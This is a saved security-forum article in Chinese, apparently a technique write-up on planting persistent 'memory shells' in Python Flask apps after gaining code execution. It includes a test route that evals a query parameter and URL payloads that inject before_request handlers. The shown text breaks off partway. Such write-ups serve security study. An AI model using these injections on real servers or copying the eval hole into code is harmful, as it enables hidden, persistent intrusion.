<!DOCTYPE html> <html lang=en style><!--
Page saved with SingleFile
url: https://xz.aliyun.com/t/14421
--><meta charset=utf-8>
<title>Python Flask内存马的另辟途径</title>
<meta name=description content=先知社区,先知安全技术社区>
<meta name=viewport content="width=device-width,initial-scale=1.0,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no">
<style>/*!
* Bootstrap v2.3.1
*
* Copyright 2012 Twitter, Inc
* Licensed under the Apache License v2.0
* http://www.apache.org/licenses/LICENSE-2.0
*
* Designed and built with all the love in the world @twitter by @mdo and @fat.
*/.clearfix:before,.clearfix:after{display:table;line-height:0;content:""}.clearfix:after{clear:both}footer{display:block}html{font-size:100%;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%}a:focus{outline:thin dotted #333;outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}a:hover,a:active{outline:0}img{height:auto;vertical-align:middle;-ms-interpolation-mode:bicubic}input{margin:0}button{-webkit-appearance:button}body{margin:0;font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;font-size:14px;line-height:20px;color:#333}a{text-decoration:none}a:hover,a:focus{color:#005580;text-decoration:underline}.row:before,.row:after{display:table;line-height:0;content:""}.row:after{clear:both}.container{width:940px}.span10{width:780px}.container{margin-right:auto;margin-left:auto}.container:before,.container:after{display:table;line-height:0;content:""}.container:after{clear:both}p{margin:0 0 10px}strong{font-weight:bold}.text-right{text-align:right}.text-center{text-align:center}h2,h4{margin:10px 0;font-family:inherit;font-weight:bold;line-height:20px;color:inherit;text-rendering:optimizelegibility}h4{font-size:17.5px}ul{padding:0}hr{margin:20px 0;border:0;border-top:1px solid #eee;border-bottom:1px solid #fff}code,pre{color:#333;-webkit-border-radius:3px;-moz-border-radius:3px}code{color:#d14;white-space:nowrap;border:1px solid #e1e1e8}pre{display:block;margin:0 0 10px;white-space:pre-wrap;border:1px solid rgba(0,0,0,0.15);-webkit-border-radius:4px;-moz-border-radius:4px}input{font-weight:normal}input{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif}input[type="text"]{display:inline-block;padding:4px 6px;margin-bottom:10px;font-size:14px;line-height:20px;vertical-align:middle;-webkit-border-radius:4px;-moz-border-radius:4px}input{width:206px}input[type="text"]{background-color:#fff;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075);-moz-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075);box-shadow:inset 0 1px 1px 
rgba(0,0,0,0.075);-webkit-transition:border linear .2s,box-shadow linear .2s;-moz-transition:border linear .2s,box-shadow linear .2s;-o-transition:border linear .2s,box-shadow linear .2s;transition:border linear .2s,box-shadow linear .2s}textarea:focus,input[type="text"]:focus,input[type="password"]:focus,input[type="datetime"]:focus,input[type="datetime-local"]:focus,input[type="date"]:focus,input[type="month"]:focus,input[type="time"]:focus,input[type="week"]:focus,input[type="number"]:focus,input[type="email"]:focus,input[type="url"]:focus,input[type="search"]:focus,input[type="tel"]:focus,input[type="color"]:focus,.uneditable-input:focus{border-color:rgba(82,168,236,0.8);outline:0;outline:thin dotted \9;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075),0 0 8px rgba(82,168,236,0.6);-moz-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075),0 0 8px rgba(82,168,236,0.6);box-shadow:inset 0 1px 1px rgba(0,0,0,0.075),0 0 8px rgba(82,168,236,0.6)}input::-webkit-input-placeholder,textarea::-webkit-input-placeholder{color:#999}input{margin-left:0}input:focus:invalid,textarea:focus:invalid,select:focus:invalid{color:#b94a48;border-color:#ee5f5b}input:focus:invalid:focus,textarea:focus:invalid:focus,select:focus:invalid:focus{border-color:#e9322d;-webkit-box-shadow:0 0 6px #f8b9b7;-moz-box-shadow:0 0 6px #f8b9b7;box-shadow:0 0 6px #f8b9b7}.fade{opacity:0;-webkit-transition:opacity .15s linear;-moz-transition:opacity .15s linear;-o-transition:opacity .15s linear}.collapse{position:relative;-webkit-transition:height .35s ease;-moz-transition:height .35s ease;-o-transition:height .35s ease;transition:height .35s ease}.btn{text-shadow:0 1px 1px rgba(255,255,255,0.75);vertical-align:middle;background-image:-moz-linear-gradient(top,#fff,#e6e6e6);background-image:-webkit-gradient(linear,0 0,0 100%,from(#fff),to(#e6e6e6));background-image:-webkit-linear-gradient(top,#fff,#e6e6e6);background-image:-o-linear-gradient(top,#fff,#e6e6e6);background-repeat:repeat-x;border:1px solid 
#ccc;border-bottom-color:#b3b3b3;-webkit-border-radius:4px;-moz-border-radius:4px;-webkit-box-shadow:inset 0 1px 0 rgba(255,255,255,0.2),0 1p
<style>/*! Editor.md v1.5.0 | editormd.min.css | Open source online markdown editor. | MIT License | By: Pandao | https://github.com/pandao/editor.md | 2015-06-09 *//*! prefixes.scss v0.1.0 | Author: Pandao | https://github.com/pandao/prefixes.scss | MIT license | Copyright (c) 2015 */@media only screen and (-webkit-min-device-pixel-ratio:2),only screen and (min-device-pixel-ratio:2){}@media only screen and (-webkit-min-device-pixel-ratio:3),only screen and (min-device-pixel-ratio:3){}/*! prefixes.scss v0.1.0 | Author: Pandao | https://github.com/pandao/prefixes.scss | MIT license | Copyright (c) 2015 *//*!
* Font Awesome 4.3.0 by @davegandy - http://fontawesome.io - @fontawesome
* License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License)
*/@-webkit-keyframes fa-spin{0%{-webkit-transform:rotate(0);transform:rotate(0)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@keyframes fa-spin{0%{-webkit-transform:rotate(0);transform:rotate(0)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}/*! prefixes.scss v0.1.0 | Author: Pandao | https://github.com/pandao/prefixes.scss | MIT license | Copyright (c) 2015 *//*! github-markdown-css | The MIT License (MIT) | Copyright (c) Sindre Sorhus <sindresorhus@gmail.com> (sindresorhus.com) | https://github.com/sindresorhus/github-markdown-css */.markdown-body{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;overflow:hidden}.markdown-body *{-moz-box-sizing:border-box}.markdown-body a:active,.markdown-body a:hover{outline:0;text-decoration:underline}.markdown-body>:first-child{margin-top:0 !important}.markdown-body>:last-child{margin-bottom:0 !important}.markdown-body img{-moz-box-sizing:border-box}.markdown-body code:after,.markdown-body code:before{letter-spacing:-.2em;content:" "}/*! Pretty printing styles. Used with prettify.js. */@media screen{}@media screen{}</style>
<style>/*!
* Bootstrap Responsive v2.3.1
*
* Copyright 2012 Twitter, Inc
* Licensed under the Apache License v2.0
* http://www.apache.org/licenses/LICENSE-2.0
*
* Designed and built with all the love in the world @twitter by @mdo and @fat.
*/.clearfix:before,.clearfix:after{display:table;line-height:0;content:""}.clearfix:after{clear:both}@-ms-viewport{width:device-width}@media(min-width:768px) and (max-width:979px){}@media(max-width:767px){}@media(min-width:1200px){.row{margin-left:-30px}.row:before,.row:after{display:table;line-height:0;content:""}.row:after{clear:both}[class*="span"]{float:left;min-height:1px;margin-left:30px}.container{width:1170px}.span10{width:970px}input{margin-left:0}}@media(min-width:768px) and (max-width:979px){.row{margin-left:-20px}.row:before,.row:after{display:table;line-height:0;content:""}.row:after{clear:both}[class*="span"]{float:left;min-height:1px;margin-left:20px}.container{width:724px}.span10{width:600px}input{margin-left:0}}@media(max-width:767px){body{padding-right:0px;padding-left:0px}.container{width:auto}.row{margin-left:0}[class*="span"]{display:block;float:none;width:100%;margin-left:0;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}.modal{position:fixed;right:20px;left:20px;width:auto;margin:0}.modal.fade{top:-100px}}@media(max-width:480px){.nav-collapse{-webkit-transform:translate3d(0,0,0)}.modal{top:10px;right:10px;left:10px}}@media(max-width:979px){body{padding-top:0}.navbar .container{width:auto;padding:0}.navbar .brand{padding-right:10px;padding-left:10px}.nav-collapse{clear:both}.nav-collapse.collapse{height:0;overflow:hidden}}@media(min-width:980px){.nav-collapse.collapse{height:auto !important;overflow:visible !important}}</style>
<style>li{line-height:26px}a:hover{text-decoration:none}.post-user-action>span{margin-right:10px;line-height:21px;border:0}.post-user-action .i-seprator{color:rgba(0,0,0,0.1);margin:0 2px}.navbar .brand{padding:0;height:50px;margin-left:0;display:inline-block !important;background-repeat:no-repeat;width:120px;background-size:207px 50px;background-image:url(data:image/svg+xml;base64,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)}.brand-box{position:absolute}.related-section{min-height:42px;padding:5px 0;margin-top:25px;border-top:1px solid #eee}.related-section>.related-
<style>a{color:#778087}.topic-list p{margin:0}.topic-content{min-height:40px}.collapse form{position:relative;width:300px;float:right}div.search{padding:10px 0}.d1 input{height:20px;padding-left:18px;border:1px solid #ddd;border-radius:15px;outline:0;background:#fff;color:#9e9c9c;float:right}.vote{font-weight:normal;margin-left:6px}.topic-list{word-break:break-all;word-wrap:break-word}ul{margin:0 0 10px 0}/*!*border-bottom: solid #eee 1px;*!*/.user-info{padding:5px 0 5px 0}.topic-info a,.topic-info{padding-top:5px}.topic-info a:hover{text-decoration:solid}.reminder{min-height:200px;border:1px #ddd solid;border-radius:3px;line-height:200px;text-align:center}</style>
<style>body{background-color:#eee}form{margin:0 !important}a:focus{text-decoration:none}.markdown-body p>code{white-space:normal;word-break:break-all;border:none !important}.box ul,ol{margin-bottom:0px !important}.markdown-body ul{list-style-type:disc}.markdown-body ul{margin:0 0 24px 0 !important}.box a:hover{text-decoration:none}.box-container>ul>li{list-style-type:none}#Wrapper .row.box{margin-left:0px}.navbar-inner{border-radius:0px;min-height:40px;padding-right:0px;padding-left:0px;outline:0;margin-bottom:0;list-style:none;z-index:1050;background:#fff;-webkit-box-shadow:0 1px 4px rgba(0,21,41,0.08);box-shadow:0 1px 4px rgba(0,21,41,0.08);line-height:46px;-webkit-transition:background .3s,width .2s;-o-transition:background .3s,width .2s;transition:background .3s,width .2s}.bs-docs-footer{text-align:left;color:#99979c;height:64px;background-color:#FFF;border-top:1px solid rgba(0,0,0,0.22);line-height:64px}.bs-docs-footer .links>a{display:inline-block;padding:0 12px;border-left:1px solid #e8e8e8;color:#8c8c8c;line-height:1}.bs-docs-footer .links>a:first-child{border-left:0}.box-container .user-info{margin-bottom:10px;background:#fff}.content-title{font-size:24px;color:#333;text-decoration:none;line-height:24px;text-shadow:0 1px 0#fff}.markdown-body h2{border-bottom:0}.box-container{padding:20px}.breadcrumb{padding:8px 10px 8px 15px;margin-bottom:10px;border-radius:0;color:#000;background-color:#fff}.breadcrumb>li{text-shadow:none !important;margin:2px 0px}.active{text-shadow:none !important}.breadcrumb .active{color:#555;display:inline-block;text-shadow:none !important}.label{background-color:#f4f4f4;line-height:12px;display:inline-block;padding:4px 4px 4px 4px;-moz-border-radius:2px;-webkit-border-radius:2px;border-radius:2px;text-decoration:none;text-shadow:none;font-weight:normal}.topic-info{color:#999 !important;font-size:12px !important}.topic-info a{padding:0px;color:#555 !important;font-size:12px !important}.topic-info 
a:hover{color:#4d5256;text-decoration:underline}.topic-info .cell{padding-left:0 !important;margin-left:0px;font-size:10px;font-weight:bold}.markdown-body img{max-width:90% !important;text-align:center;margin-left:auto;margin-right:auto;display:block;padding:10px 0px 10px 0px}.topic-info span{margin-left:0px;font-size:10px;color:rgba(0,0,0,0.45)}.btn{display:inline-block;padding:4px 12px;margin-bottom:0;font-size:14px;line-height:20px;background-color:#f4f4f4;color:#444;border-color:#ddd;font-family:"Helvetica Neue For Number",-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"PingFang SC","Hiragino Sans GB","Microsoft YaHei","Helvetica Neue",Helvetica,Arial,sans-serif;-webkit-box-sizing:border-box;box-sizing:border-box;margin:0;list-style:none;font-weight:400;text-align:center;cursor:pointer;background-image:none;white-space:nowrap;border-radius:2px;height:32px;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none}.box{font-family:Monospaced Number,Chinese Quote,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,PingFang SC,Hiragino Sans GB,Microsoft YaHei,Helvetica Neue,Helvetica,Arial,sans-serif;font-size:14px;line-height:1.5;color:rgba(0,0,0,0.65);-webkit-box-sizing:border-box;box-sizing:border-box;margin-top:0 !important;margin-bottom:20px;padding:0;list-style:none;background:#fff;border-radius:2px;position:relative;-webkit-transition:all .3s;-o-transition:all .3s;transition:all .3s;-moz-box-shadow:0 1px 1px rgba(0,0,0,0.15);-webkit-box-shadow:0 1px 1px rgba(143,168,191,.35);box-shadow:0 1px 1px rgba(143,168,191,.35);border-bottom:1px solid #e2e2e9}.span10{float:left;min-height:1px}#Wrapper .span10{margin-left:0px !important;max-width:960px}@media(min-width:1200px){.container{width:82% !important}}@media screen and (min-width:1500px){#Wrapper.container,.navbar .navbar-inner .container,.bs-docs-footer .container{max-width:1100px !important}#Wrapper .span10{max-width:810px !important}}@media screen and (min-width:980px) and 
(max-width:1499px){#Wrapper.container,.navbar .navbar-inner .container,.bs-docs-footer .container{max-width:1100px !important}#Wrapper .span10{max-width:74% !i
<style>/*! prefixes.scss v0.1.0 | Author: Pandao | https://github.com/pandao/prefixes.scss | MIT license | Copyright (c) 2015 */@media only screen and (-webkit-min-device-pixel-ratio:2),only screen and (min-device-pixel-ratio:2){}@media only screen and (-webkit-min-device-pixel-ratio:3),only screen and (min-device-pixel-ratio:3){}/*! prefixes.scss v0.1.0 | Author: Pandao | https://github.com/pandao/prefixes.scss | MIT license | Copyright (c) 2015 *//*!
* Font Awesome 4.3.0 by @davegandy - http://fontawesome.io - @fontawesome
* License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License)
*/.pull-right{float:right}.pull-left{float:left}@-webkit-keyframes fa-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@keyframes fa-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}/*! prefixes.scss v0.1.0 | Author: Pandao | https://github.com/pandao/prefixes.scss | MIT license | Copyright (c) 2015 *//*! github-markdown-css | The MIT License (MIT) | Copyright (c) Sindre Sorhus <sindresorhus@gmail.com> (sindresorhus.com) | https://github.com/sindresorhus/github-markdown-css */.markdown-body{color:#333;font-family:Monospaced Number,Chinese Quote,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,PingFang SC,Hiragino Sans GB,Microsoft YaHei,Helvetica Neue,Helvetica,Arial,sans-serif;font-size:15px;line-height:24px;letter-spacing:.05em;word-wrap:break-word}.markdown-body a{background:transparent}.markdown-body a:active,.markdown-body a:hover{outline:0}.markdown-body img{border:0}.markdown-body pre{font-family:"Meiryo UI","YaHei Consolas Hybrid",Consolas,"Malgun Gothic","Segoe UI","Trebuchet MS",Helvetica,monospace,monospace}.markdown-body *{-moz-box-sizing:border-box;box-sizing:border-box}.markdown-body a{color:#4183c4;text-decoration:none}.markdown-body a:hover,.markdown-body a:active{text-decoration:underline}.markdown-body ul{padding:0}.markdown-body code{font-family:Consolas,"Liberation Mono",Menlo,Courier,monospace}.markdown-body pre{font:12px Consolas,"Liberation Mono",Menlo,Courier,monospace}.markdown-body>*:first-child{margin-top:0 !important}.markdown-body>*:last-child{margin-bottom:0 !important}.markdown-body h2{position:relative;margin-top:1em;margin-bottom:16px;font-weight:bold}.markdown-body h2{padding-bottom:0em;font-size:24px;line-height:1.225}.markdown-body p,.markdown-body ul,.markdown-body pre{margin-top:0;margin-bottom:24px}.markdown-body ul{padding-left:2em}.markdown-body 
img{max-width:100%;-moz-box-sizing:border-box;box-sizing:border-box}.markdown-body code{padding:0;padding-top:.2em;padding-bottom:.2em;margin:0;font-size:85%;background-color:rgba(0,0,0,0.04);border-radius:3px}.markdown-body code:before,.markdown-body code:after{letter-spacing:-0.2em;content:" "}.markdown-body .highlight{margin-bottom:16px}.markdown-body .highlight pre{padding:16px;overflow:auto;font-size:85%;background-color:#f7f7f7;border-radius:3px}.markdown-body .highlight pre{margin-bottom:0;word-break:normal}.markdown-body pre{word-wrap:normal}/*! Pretty printing styles. Used with prettify.js. */@media screen{}.markdown-body .highlight pre{line-height:1.6}@media screen{}</style>
<style>.highlight .k{color:#204a87;font-weight:bold}.highlight .n{color:#000}.highlight .o{color:#ce5c00;font-weight:bold}.highlight .p{color:#000;font-weight:bold}.highlight .c1{color:#8f5902;font-style:italic}.highlight .nb{color:#204a87}.highlight .nd{color:#5c35cc;font-weight:bold}.highlight .nf{color:#000}.highlight .ow{color:#204a87;font-weight:bold}.highlight .mf{color:#0000cf;font-weight:bold}.highlight .mi{color:#0000cf;font-weight:bold}.highlight .s2{color:#4e9a06}.highlight .se{color:#4e9a06}.highlight .si{color:#4e9a06}.highlight .s1{color:#4e9a06}</style>
<style>@-webkit-keyframes a{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@keyframes a{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@media(max-width:800px){}</style>
<!--[if lte IE 8]>
<script src="http://code.jquery.com/jquery-1.11.3.min.js"></script>
<![endif]-->
<!--[if !IE]> -->
<style>#waf_nc_block{position:fixed;width:100%;height:100%;top:0;bottom:0;left:0;z-index:99999}</style><style>@media(pointer:coarse){@media only screen and (max-device-width:1024px){}@media only screen and (max-device-width:414px){}@media only screen and (max-device-width:320px){}}</style><style>@media screen and (max-width:768px){}</style><style>/*!
* Waves v0.7.5
* http://fian.my.id/Waves
*
* Copyright 2014-2016 Alfiana E. Sibuea and other contributors
* Released under the MIT license
* https://github.com/fians/Waves/blob/master/LICENSE
*/</style><style>@media(max-height:620px){}@media(max-height:783px){}@-webkit-keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}@keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}</style><style>@-webkit-keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@media(pointer:coarse){}</style><style>:root{--sr-annote-color-0:#b4d9fb;--sr-annote-color-1:#ffeb3b;--sr-annote-color-2:#a2e9f2;--sr-annote-color-3:#a1e0ff;--sr-annote-color-4:#a8ea68;--sr-annote-color-5:#ffb7da}</style><style>@-webkit-keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes 
sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@-webkit-keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@-webkit-keyframes fadeOut{0%{opacity:1}to{opacity:0}}@keyframes fadeOut{0%{opacity:1}to{opacity:0}}@-webkit-keyframes fadeIn{0%{opacity:0}to{opacity:1}}@keyframes fadeIn{0%{opacity:0}to{opacity:1}}@-webkit-keyframes swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}@keyframes 
swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:transl
<body>
<div class="navbar navbar-default">
<div class=navbar-inner>
<div class=container style=text-align:center;position:relative>
<!--[if lte IE 8]>
<span style="display:inline-block;margin:0 auto;color:red;">为了更好的体验,请使用IE10及以上版本</span>
<![endif]-->
<div class=brand-box>
<a class=brand href=https://xz.aliyun.com/tab/1></a>
</div>
<a href="https://account.aliyun.com/login/login.htm?oauth_callback=https%3A%2F%2Fxz.aliyun.com%2Ft%2F14421%3Fu_atoken%3D408583c98d3c33ff2f0f44cb3eb738cf%26u_asession%3D01oib2BtUMe2FXsB5mgb-5KWpfBpg0aB7kHsSD147UFUZ81UvygBm_8ivwc-Zs-Z_7dlmHJsN3PcAI060GRB4YZGyPlBJUEqctiaTooWaXr7I%26u_asig%3D05BssisGG8Ei4348apGffqEtOIzJXnEfJmfjmUSag0uv4_Mdeo4z7ZppbV1Ay2bzLQtgDAtwBJIuwodggTkYqzpCChHzr67OoSq_lrpKJaWbFzktHyor2aTvLvtD025aS8xcwzHVD6-nhy4jLXKQl-Zboaxjm0FgrL7bN1gR9Lc4Fg2QMxYs6lyXb1lFWKql569vtzFx81YCFuUHUUg160WlR6404rUEm5vP7bKjBmNdPSlrUhBeGdMwM10MY-j4ftCC9TI14p0PFW6OVnTKD1etTkd7iI1CG-hb7Kwikd4sI%26u_aref%3DE5KVdHHHshks9dYBOUXEjRSnm8E%253D&from_type=xianzhi" class="pull-right anonymous-user hh_loding sf-hidden">
登录</a>
<div class="nav-collapse collapse">
<div class="search d1 text-right">
<form action=/search>
<input type=text placeholder=搜索 name=keyword value>
</form>
</div>
</div>
</div>
</div>
</div>
<div id=Wrapper class=container>
<div class=row2>
<div class=span10>
<div class="row box content" width="1200px !important" style=width:1200px>
<div class=box-container>
<div class=main-topic>
<div class="clearfix user-info topic-list">
<p><span class=content-title>Python Flask内存马的另辟途径</span>
</p>
<div class=topic-info>
<span class=info-left>
<a href=https://xz.aliyun.com/u/65763>
<span class="username cell"> 1458662274227693</span></a> <span class=i-seprator> / </span>
<span> 2024-05-06 19:36:03</span><span class=i-seprator> / </span>
<span>发表于北美地区 / </span>
<span>浏览数 272</span>
<span class=content-node>
<span class="label label-default label-node-first">
<a href=https://xz.aliyun.com/tab/1>技术文章</a></span>
<span class="label label-default">
<a href=https://xz.aliyun.com/node/11>技术文章</a></span>
</span>
</span>
<span class="pull-right t-vote cell info-right"><a class="vote vote-up" href=javascript:void(0)>
顶(1)</a>
<a class="vote vote-down" href=javascript:void(0)>
踩(0)</a></span>
</div>
</div>
<hr>
<div id=topic_content class="topic-content markdown-body">
<p>最近发现了一个Python Flask框架的后台任意代码执行,利用成功以后想要进一步维持权限,所以想要使用Flask的内存马技术。</p>
<h2 id=toc-0>add_url_rule存在的局限</h2>
<p>在网上浏览了很多文章,似乎都是清一色地介绍如何使用<code>add_url_rule</code>添加路由,但当下的Flask版本似乎已经不再支持在应用开始处理请求之后再通过add_url_rule添加路由了。</p>
<p>测试代码:</p>
<div class=highlight><pre><span></span><span class=nd>@app.route</span><span class=p>(</span><span class=s1>'/e'</span><span class=p>)</span>
<span class=k>def</span> <span class=nf>e</span><span class=p>():</span>
<span class=n>a</span> <span class=o>=</span> <span class=nb>eval</span><span class=p>(</span><span class=n>request</span><span class=o>.</span><span class=n>args</span><span class=o>.</span><span class=n>get</span><span class=p>(</span><span class=s1>'cmd'</span><span class=p>))</span>
<span class=k>if</span> <span class=n>a</span> <span class=p>:</span>
<span class=k>return</span> <span class=s2>"1"</span>
<span class=k>else</span><span class=p>:</span>
<span class=k>return</span> <span class=s2>"0"</span>
</pre></div>
<p>访问<code>http://127.0.0.1:5000/e?cmd=app.add_url_rule('/shell','shell',lambda :"123")</code></p>
<p>然而会显示<code>The setup method 'add_url_rule' can no longer be called on the application.</code><br>
<a id=img0 href=https://xzfile.aliyuncs.com/media/upload/picture/20240506192047-afd92de4-0b9a-1.png title><img src="data:image/png;base64,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
<p>所以,我们只能通过其他方式添加路由来处理我们的请求,这里我们可以尝试使用<code>@app.before_request</code></p>
<h2 id=toc-1>before_request</h2>
<p>在 Flask 中,<code>before_request</code> 是一个装饰器,它用于在请求处理之前执行特定的函数。这个装饰器允许对每个请求进行一些预处理,比如认证检查、日志记录、设置响应头等。<br>
<a id=img1 href=https://xzfile.aliyuncs.com/media/upload/picture/20240506192109-bcb858a0-0b9a-1.png><img src="data:image/png;base64,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
通过底层源码可以看到<code>before_request</code>实际上调用的是<code>self.before_request_funcs.setdefault(None, []).append(f)</code>,其意思是:</p>
<ul>
<li>检查 <code>self.before_request_funcs</code> 字典中是否有一个键为 <code>None</code> 的条目。</li>
<li>如果没有 <code>None</code> 键,就在字典中创建它,并将其值设置为一个空列表。</li>
<li>然后,无论 <code>None</code> 键是否存在,都将函数 <code>f</code> 添加到这个列表中。</li>
</ul>
<p>这个函数f就是我们要添加的函数。</p>
<p>当访问<code>http://127.0.0.1:5000/e?cmd=app.before_request_funcs.setdefault(None, []).append(lambda: "123")</code>后,后续所有的访问结果都将变成123<br>
<a id=img2 href=https://xzfile.aliyuncs.com/media/upload/picture/20240506192128-c88394b0-0b9a-1.png><img src=data:image/png;base64,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
可见通过<code>before_request</code>添加内存马这一条路是可行的,但同样有一个问题:<code>before_request</code>钩子一旦返回了非None的值,Flask就会直接把它当作本次请求的响应,不再执行原本的视图函数,因此服务后续所有正常请求都无法得到处理,会影响到主机的正常业务。</p>
<h2 id=toc-2>after_request</h2>
<p>针对这个问题,我们可以使用<code>@app.after_request</code>来解决,与<code>@app.before_request</code>类似,<code>after_request</code>会在请求结束得到响应包之后进行操作,查看底层源码可以看到其调用方法和<code>before_request</code>类似<br>
<a id=img3 href=https://xzfile.aliyuncs.com/media/upload/picture/20240506192140-cf994344-0b9a-1.png><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAA2gAAAIVCAYAAACk3dyWAAEAAElEQVR4nOz9d3xc133g/X/uNGDuHcwMOggQlZ0gKVI0TVVaLXKLEydOcTYuKVuyJdmS3f1tns2zJVuTzT67z27K9sTrPOkbO3bsWJZkSbEkSqwiBBaAKARIFGIATG8YzJzfH4MyIADiDDggh8L3/fLrZRFz5572Pefec++5d4y29i6FEEIIIYQQQogHzvagMyCEEEIIIYQQIk8maEIIIYQQQghRJmSCJoQQQgghhBBlQiZoQgghhBBCCFEmZIImhBBCCCGEEGVCJmhCCCGEEEIIUSZkgiaE1cLhQ624lPzihBAfBMrq4PDBRiqRPi2EEOLh43jQGRDiQVF4OfTpn+LzHz1K/fgf8/PvjzL3oDMlhLh3/kf50b//ffjGz/D13/ptvj2YeNA5EkIIIbQZW/lD1WrvMb7yMYvf/9J3+cOwsbl92Kr4vo89wg+0V1HtNLAZBjfffYO/9U6sxLm9I117N00/+s9o3r8Ll8uBYRgkvvND9LzUt7yNcuI5+bNU8x3G3r2IMjZXRlEaxbSHUh6O/fQ/4W88WcnAS7/L73/rDKOR3Jbkq6n1x/nCDv9y2tl+vnLu2wzcLX/UcbzrOR7z12DabdgMg+lbv8//Gp/Zkjwupevo4Hv+6k/xiUM78VbasRkG41//x/zin9wsfVoN38cv/dvP0LpOPahrX+Zv/ttvk9rCfqVTXqVs7H72hzjKef70tQHmpZ8/UDrtoZQD/+4n+N4f/1Gea57hG//+X/In1x+uyy/SP8RmSHsI8cFQ9nfQGo5285NdNt544wLvxvNzycTs1l8NdT31j2jvdjH99f+L2cg8ALnAnSepLjxHf4IWJhl79+KW50lsRL89Ko79Jb74lJ+hP/4l/v03bpLdwoPYbOB1/iTiBMBb+zTPV2/8naqmp3muxs6VkW/TP5efOM6lwluWx0W1L36Ozx5zcvr3/gsXQ/m4T45PbU1iwXf43V+7hQVAG8/95R+g+crv8ztv385/HhklvTUpL9Err4vOk5/kEwT5xmsDzG9xnsRGNm4Pw5gnPPgX/M6/uUn6F3+RT/zUZ7j4C7/LMA/Ryar0D7Ep0h5CfBCU/QSt2W9iS0zy7Z5Jrt7